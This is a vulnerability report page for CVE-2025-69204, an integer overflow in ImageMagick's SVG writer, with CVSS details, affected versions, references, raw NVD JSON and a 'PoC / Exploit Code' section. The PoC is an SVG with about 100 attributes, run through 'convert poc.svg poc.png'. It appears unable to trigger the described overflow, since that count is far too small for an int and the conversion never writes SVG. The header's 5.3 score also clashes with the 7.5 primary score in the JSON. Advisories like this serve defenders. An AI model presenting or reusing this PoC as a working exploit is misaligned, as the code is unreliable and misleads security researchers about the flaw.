Security Vulnerability Report
CVE-2025-69204 CVSS 5.3 MEDIUM

Published: 2025-12-30 17:15:44
Last Modified: 2026-01-06 18:07:42

Description

ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-12, the WriteSVGImage function stored number_attributes in an int variable, which could overflow. The integer overflow in turn triggered a buffer overflow, resulting in denial of service (DoS). Version 7.1.2-12 fixes the issue.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:* - VULNERABLE
ImageMagick < 7.1.2-12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <!-- PoC for CVE-2025-69204: ImageMagick WriteSVGImage Integer Overflow -->
  <!-- Generate SVG with excessive attributes to trigger integer overflow in number_attributes -->
  <rect fill="red" stroke="blue" stroke-width="2" opacity="0.8" style="display:block"
        class="test" id="element1" data-test="value"
        attr1="val1" attr2="val2" attr3="val3" attr4="val4" attr5="val5"
        attr6="val6" attr7="val7" attr8="val8" attr9="val9" attr10="val10"
        attr11="val11" attr12="val12" attr13="val13" attr14="val14" attr15="val15"
        attr16="val16" attr17="val17" attr18="val18" attr19="val19" attr20="val20"
        attr21="val21" attr22="val22" attr23="val23" attr24="val24" attr25="val25"
        attr26="val26" attr27="val27" attr28="val28" attr29="val29" attr30="val30"
        attr31="val31" attr32="val32" attr33="val33" attr34="val34" attr35="val35"
        attr36="val36" attr37="val37" attr38="val38" attr39="val39" attr40="val40"
        attr41="val41" attr42="val42" attr43="val43" attr44="val44" attr45="val45"
        attr46="val46" attr47="val47" attr48="val48" attr49="val49" attr50="val50"
        attr51="val51" attr52="val52" attr53="val53" attr54="val54" attr55="val55"
        attr56="val56" attr57="val57" attr58="val58" attr59="val59" attr60="val60"
        attr61="val61" attr62="val62" attr63="val63" attr64="val64" attr65="val65"
        attr66="val66" attr67="val67" attr68="val68" attr69="val69" attr70="val70"
        attr71="val71" attr72="val72" attr73="val73" attr74="val74" attr75="val75"
        attr76="val76" attr77="val77" attr78="val78" attr79="val79" attr80="val80"
        attr81="val81" attr82="val82" attr83="val83" attr84="val84" attr85="val85"
        attr86="val86" attr87="val87" attr88="val88" attr89="val89" attr90="val90"
        attr91="val91" attr92="val92" attr93="val93" attr94="val94" attr95="val95"
        attr96="val96" attr97="val97" attr98="val98" attr99="val99" attr100="val100"
        x="0" y="0" width="100" height="100" />
</svg>
<!-- Usage: convert poc.svg poc.png or identify poc.svg -->

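References

https://github.com/ImageMagick/ImageMagick/commit/2c08c2311693759153c9aa99a6b2dcb5f985681e (Patch)
https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hrh7-j8q2-4qcw (Exploit, Vendor Advisory)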

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69204", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:43.920", "lastModified": "2026-01-06T18:07:41.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-12, in the WriteSVGImage function, using an int variable to store number_attributes caused an integer overflow. This, in turn, triggered a buffer overflow and caused a DoS attack. Version 7.1.2-12 fixes the issue."}, {"lang": "es", "value": "ImageMagick es un software libre y de código abierto utilizado para editar y manipular imágenes digitales. Antes de la versión 7.1.2-12, en la función WriteSVGImage, el uso de una variable int para almacenar number_attributes causó un desbordamiento de entero. Esto, a su vez, desencadenó un desbordamiento de búfer y causó un ataque DoS. La versión 7.1.2-12 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": 
"Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.2-12", "matchCriteriaId": "316134FB-09AF-4983-8BCC-E391E2C259E2"}]}]}], "references": [{"url": "https://github.com/ImageMagick/ImageMagick/commit/2c08c2311693759153c9aa99a6b2dcb5f985681e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hrh7-j8q2-4qcw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}